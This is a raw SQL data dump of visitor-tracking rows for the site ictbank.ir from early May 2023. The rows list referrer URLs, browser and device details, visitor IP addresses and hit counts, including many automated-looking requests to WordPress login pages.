(32248,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','157.230.244.54','000',0,2,0),
(32249,'2023-05-04','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','112.0.0.0','desktop','Unknown','','217.218.196.253','000',0,119,0),
(32250,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','199.204.248.137','000',0,2,0),
(32251,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','157.230.243.173','000',0,2,0),
(32252,'2023-05-04','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','195.114.27.206','000',0,2,0),
(32253,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.255.118.204','000',0,1,0),
(32254,'2023-05-04','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.255.118.203','000',0,1,0),
(32255,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','3.18.68.249','000',0,2,0),
(32256,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','94.130.32.145','000',0,2,0),
(32257,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','27.254.33.44','000',0,2,0),
(32258,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','139.59.23.209','000',0,2,0),
(32259,'2023-05-04','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','205.147.100.196','000',0,1,0),
(32260,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','208.73.203.76','000',0,2,0),
(32261,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','83.175.83.215','000',0,2,0),
(32262,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','144.76.218.211','000',0,2,0),
(32263,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','132.148.120.149','000',0,1,0),
(32265,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','34.213.232.105','000',0,2,0),
(32266,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','148.72.87.45','000',0,2,0),
(32267,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','172.105.86.218','000',0,1,0),
(32268,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','81.19.145.28','000',0,1,0),
(32269,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','209.145.53.90','000',0,2,0),
(32270,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','46.235.42.181','000',0,1,0),
(32271,'2023-05-04','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','72.167.226.206','000',0,2,0),
(32272,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','46.235.42.44','000',0,2,0),
(32273,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','148.66.146.22','000',0,2,0),
(32274,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.71.240.21','000',0,2,0),
(32275,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','90.182.206.228','000',0,2,0),
(32276,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','72.167.251.52','000',0,2,0),
(32277,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','122.155.17.184','000',0,1,0),
(32278,'2023-05-04','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.243.23.49','000',0,1,0),
(32279,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','15.204.22.133','000',0,1,0),
(32280,'2023-05-04','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','62.210.185.4','000',0,1,0),
(32281,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','209.126.8.209','000',0,1,0),
(32282,'2023-05-04','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','103.19.37.159','000',0,1,0),
(32283,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','46.235.40.53','000',0,1,0),
(32284,'2023-05-04','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','150.107.31.72','000',0,1,0),
(32285,'2023-05-04','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,6,0),
(32286,'2023-05-04','https://ictbank.ir/hooman/admin/index.php?pid=students&student_id=26&func=courses','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.152.201','000',0,4,0),
(32287,'2023-05-04','http://ictbank.ir/','Chrome','Windows','54.0.0.0','desktop','Unknown','','111.59.253.216','000',0,1,0),
(32288,'2023-05-04','https://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','178.131.179.151','000',0,1,0),
(32289,'2023-05-04','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.70.224.166','000',0,1,0),
(32290,'2023-05-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(32291,'2023-05-04','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.76','000',0,3,0),
(32292,'2023-05-04','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(32293,'2023-05-04','https://ictbank.ir/blog','Firefox','Linux','2.0.0.0','desktop','Unknown','','188.126.94.44','000',0,2,0),
(32294,'2023-05-04','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,1,0),
(32295,'2023-05-04','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,1,0),
(32296,'2023-05-05','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32297,'2023-05-05','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(32298,'2023-05-05','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Nexus 5X','','74.125.210.76','000',0,1,0),
(32299,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32300,'2023-05-05','https://search.brave.com/','Chrome','Windows','112.0.0.0','desktop','Unknown','','179.6.225.105','000',0,1,0),
(32301,'2023-05-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(32302,'2023-05-05','http://ictbank.ir/wp-json/wp/v2/posts','Opera','Windows','35.0.0.0','desktop','Unknown','','192.198.126.221','000',0,1,0),
(32303,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','185.70.95.8','000',0,1,0),
(32304,'2023-05-05','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(32305,'2023-05-05','https://ictbank.ir/blog','Chrome','Windows','56.0.0.0','desktop','Unknown','','54.172.179.34','000',0,2,0),
(32306,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','51.79.177.175','000',0,1,0),
(32307,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(32308,'2023-05-05','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,4,0),
(32309,'2023-05-05','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.238.205.179','000',0,98,0),
(32310,'2023-05-05','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','69.4.87.74','000',0,1,0),
(32311,'2023-05-05','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(32312,'2023-05-05','https://ictbank.ir/sites/kasrainfotech/wp-login.php','Chrome','OS X','112.0.0.0','desktop','Macintosh','','31.56.86.58','000',0,27,0),
(32313,'2023-05-05','https://ictbank.ir/sites/kasrainfotech/wp-admin/post.php?post=21&action=elementor','Safari','iOS','16.0','mobile:smart','iPhone','','62.102.133.147','000',0,1,0),
(32314,'2023-05-05','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,1,0),
(32315,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,1,0),
(32316,'2023-05-05','https://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','20.121.126.108','000',0,3,0),
(32317,'2023-05-05','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.74.217','000',0,2,0),
(32318,'2023-05-05','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.94.159','000',0,1,0),
(32319,'2023-05-05','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.254.85.182','000',0,1,0),
(32320,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','212.71.233.243','000',0,2,0),
(32321,'2023-05-05','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.125.112.145','000',0,1,0),
(32322,'2023-05-05','https://ictbank.ir/blog','Chrome','OS X','58.0.0.0','desktop','Macintosh','','158.69.247.77','000',0,2,0),
(32323,'2023-05-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(32324,'2023-05-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.71.236.5','000',0,1,0),
(32325,'2023-05-05','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.188.210.140','000',0,1,0),
(32326,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','174.138.9.183','000',0,1,0),
(32327,'2023-05-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,1,0),
(32328,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','49.51.134.238','000',0,1,0),
(32329,'2023-05-05','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','139.59.77.216','000',0,1,0),
(32330,'2023-05-05','https://ictbank.ir/blog','Chrome','Windows','4.0.0.0','desktop','Unknown','','60.167.52.139','000',0,1,0),
(32331,'2023-05-05','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(32332,'2023-05-05','https://ictbank.ir/blog','Vivaldi','Windows','4.0','desktop','Unknown','','193.201.9.240','000',0,2,0),
(32333,'2023-05-05','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32334,'2023-05-05','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','46.228.199.158','000',0,1,0),
(32335,'2023-05-05','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(32336,'2023-05-05','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','178.254.29.124','000',0,1,0),
(32337,'2023-05-06','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','67.231.26.219','000',0,1,0),
(32338,'2023-05-06','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','62.210.215.74','000',0,1,0),
(32339,'2023-05-06','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32340,'2023-05-06','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(32341,'2023-05-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(32342,'2023-05-06','https://ictbank.ir/productmatrix/','Chrome','OS X','112.0.0.0','desktop','Macintosh','','204.18.118.185','000',0,87,0),
(32343,'2023-05-06','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.164.227','000',0,2,0),
(32344,'2023-05-06','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','163.172.56.94','000',0,2,0),
(32345,'2023-05-06','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,110,0),
(32346,'2023-05-06','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','154.53.58.192','000',0,1,0),
(32347,'2023-05-06','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.252','000',0,1,0),
(32348,'2023-05-06','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.92','000',0,1,0),
(32349,'2023-05-06','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','206.217.136.46','000',0,1,0),
(32350,'2023-05-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32351,'2023-05-06','https://ictbank.ir/CMDB/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','93.119.34.74','000',0,16,0),
(32352,'2023-05-06','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.235.130.212','000',0,1,0),
(32353,'2023-05-06','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.214.82.101','000',0,1,0),
(32354,'2023-05-06','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','143.198.0.209','000',0,2,0),
(32355,'2023-05-06','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(32356,'2023-05-06','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','184.94.240.88','000',0,2,0),
(32357,'2023-05-06','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','151.245.188.79','000',0,18,0),
(32358,'2023-05-06','https://ictbank.ir/productmatrix/admin/index.php?pid=functions&function_id=1&func=edit','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.238.205.179','000',0,89,0),
(32359,'2023-05-06','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','81.92.205.84','000',0,2,0),
(32360,'2023-05-06','https://45.92.94.221:443/blog','Yandex Browser','Windows','17.0.0.0','desktop','Unknown','','106.75.166.179','000',0,4,0),
(32361,'2023-05-06','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.45','000',0,1,0),
(32362,'2023-05-06','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.38','000',0,1,0),
(32363,'2023-05-06','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.21','000',0,1,0),
(32364,'2023-05-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,5,0),
(32365,'2023-05-06','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','171.13.14.12','000',0,1,0),
(32366,'2023-05-06','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.167.12.26','000',0,10,0),
(32367,'2023-05-06','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(32368,'2023-05-06','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32369,'2023-05-06','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(32370,'2023-05-07','http://ictbank.ir/blog//wp-22.php','Firefox','Windows','110.0','desktop','Unknown','','104.168.190.176','000',0,1,0),
(32371,'2023-05-07','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(32372,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(32373,'2023-05-07','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32374,'2023-05-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(32375,'2023-05-07','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.121','000',0,5,0),
(32376,'2023-05-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.199.173','000',0,1,0),
(32377,'2023-05-07','https://ictbank.ir/productmatrix/admin/index.php?pid=settings','Chrome','OS X','112.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,439,0),
(32378,'2023-05-07','https://ictbank.ir/blog','Chrome','Windows','50.0.0.0','desktop','Unknown','','3.92.25.188','000',0,1,0),
(32379,'2023-05-07','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','13.55.79.252','000',0,1,0),
(32380,'2023-05-07','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','167.114.53.55','000',0,1,0),
(32381,'2023-05-07','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32382,'2023-05-07','http://ictbank.ir/wp-json/wp/v2/posts','Chrome','Windows','46.0.0.0','desktop','Unknown','','216.173.76.20','000',0,1,0),
(32383,'2023-05-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(32384,'2023-05-07','https://ictbank.ir/productmatrix/admin/index.php?pid=relations','Chrome','OS X','112.0.0.0','desktop','Macintosh','','204.18.91.162','000',0,35,0),
(32385,'2023-05-07','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32386,'2023-05-07','https://ictbank.ir/blog','Firefox','Windows','83.0','desktop','Unknown','','194.150.215.37','000',0,1,0),
(32387,'2023-05-07','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.85.155.111','000',0,2,0),
(32388,'2023-05-07','https://ictbank.ir/productmatrix/admin/index.php?pid=reports&fid=relations_products_to_functions','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.238.205.179','000',0,102,0),
(32389,'2023-05-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(32390,'2023-05-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,1,0),
(32391,'2023-05-07','https://ictbank.ir/blog','Firefox','Windows','83.0','desktop','Unknown','','46.17.44.155','000',0,1,0),
(32392,'2023-05-07','https://ictbank.ir/blog','Firefox','Windows','87.0','desktop','Unknown','','185.220.34.107','000',0,1,0),
(32393,'2023-05-07','https://nikoo-academy.com/programming-courses','Instagram','Android','281.0.0.0.0','mobile:smart','Poco X3','','192.121.17.239','000',0,1,0),
(32394,'2023-05-07','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.163.101','000',0,20,0),
(32395,'2023-05-07','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','103.187.191.180','000',0,1,0),
(32396,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','107.175.109.208','000',0,1,0),
(32397,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','66.84.88.147','000',0,2,0),
(32398,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','172.245.174.175','000',0,2,0),
(32399,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','152.44.107.249','000',0,2,0),
(32400,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','104.144.204.83','000',0,2,0),
(32401,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','192.227.182.49','000',0,2,0),
(32402,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','162.244.148.1','000',0,2,0),
(32403,'2023-05-07','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(32404,'2023-05-07','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(32405,'2023-05-07','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','172.96.93.9','000',0,1,0),
(32406,'2023-05-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','136.243.236.71','000',0,4,0),
(32407,'2023-05-08','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32408,'2023-05-08','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','150.109.11.6','000',0,1,0),
(32409,'2023-05-08','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(32410,'2023-05-08','https://ictbank.ir/blog','Firefox','Windows','60.0','desktop','Unknown','','213.159.215.68','000',0,1,0),
(32411,'2023-05-08','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.77','000',0,2,0),
(32412,'2023-05-08','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','185.244.175.65','000',0,1,0),
(32413,'2023-05-08','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(32414,'2023-05-08','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(32415,'2023-05-08','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','213.226.101.56','000',0,1,0),
(32416,'2023-05-08','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','185.181.246.205','000',0,1,0),
(32417,'2023-05-08','https://ictbank.ir/productmatrix/admin/index.php','Chrome','OS X','112.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,350,0),
(32418,'2023-05-08','https://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(32419,'2023-05-08','https://ictbank.ir/blog/','Internet Explorer','Windows','6.0','desktop','Unknown','','37.139.53.179','000',0,1,0),
(32420,'2023-05-08','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.1.48.107','000',0,3,0),
(32421,'2023-05-08','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(32422,'2023-05-08','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.217.104.127','000',0,2,0),
(32423,'2023-05-08','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.154.67.30','000',0,1,0),
(32424,'2023-05-08','https://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','167.235.229.180','000',0,1,0),
(32425,'2023-05-08','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','91.133.131.232','000',0,10,0),
(32426,'2023-05-08','https://ictbank.ir/blog','Chrome','iOS','112.0.0.0','mobile:smart','iPhone','','178.252.191.34','000',0,1,0),
(32427,'2023-05-08','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.25.190.163','000',0,1,0),
(32428,'2023-05-08','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.178.216','000',0,1,0),
(32429,'2023-05-08','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.139.66','000',0,8,0),
(32430,'2023-05-08','https://ictbank.ir/productmatrix/admin/index.php?pid=locations','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.238.205.179','000',0,31,0),
(32431,'2023-05-08','https://ictbank.ir/productmatrix/admin/index.php?pid=reports','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.238.228.12','000',0,6,0),
(32432,'2023-05-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(32433,'2023-05-08','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','46.101.103.136','000',0,1,0),
(32434,'2023-05-08','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','46.37.4.4','000',0,22,0),
(32435,'2023-05-08','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','177.55.124.62','000',0,1,0),
(32436,'2023-05-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(32437,'2023-05-08','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.154.66.181','000',0,1,0),
(32438,'2023-05-08','https://ictbank.ir/blog','Chrome','Windows','90.0.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32439,'2023-05-09','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(32440,'2023-05-09','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','142.44.129.185','000',0,48,0),
(32441,'2023-05-09','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.90','000',0,2,0),
(32442,'2023-05-09','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(32443,'2023-05-09','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32444,'2023-05-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(32445,'2023-05-09','https://ictbank.ir/productmatrix/admin/index.php?pid=customers','Chrome','OS X','112.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,20,0),
(32446,'2023-05-09','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.93','000',0,1,0),
(32447,'2023-05-09','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(32448,'2023-05-09','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(32449,'2023-05-09','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','151.234.192.178','000',0,182,0),
(32450,'2023-05-09','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32451,'2023-05-09','https://ictbank.ir/blog','Firefox','Ubuntu','24.0','desktop','Unknown','','104.28.214.162','000',0,1,0),
(32452,'2023-05-09','https://ictbank.ir/blog','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','91.107.150.191','000',0,5,0),
(32453,'2023-05-09','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.43.110.12','000',0,2,0),
(32454,'2023-05-09','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.125.151.118','000',0,1,0),
(32455,'2023-05-09','https://ictbank.ir/blog','Firefox','Windows','65.0','desktop','Unknown','','184.94.240.88','000',0,1,0),
(32456,'2023-05-09','https://search.brave.com/','Firefox','Windows','112.0','desktop','Unknown','','179.211.53.147','000',0,1,0),
(32457,'2023-05-09','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32458,'2023-05-09','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,1,0),
(32459,'2023-05-09','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,1,0),
(32460,'2023-05-09','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.211.14.123','000',0,1,0),
(32461,'2023-05-09','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(32462,'2023-05-09','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','192.169.244.239','000',0,1,0),
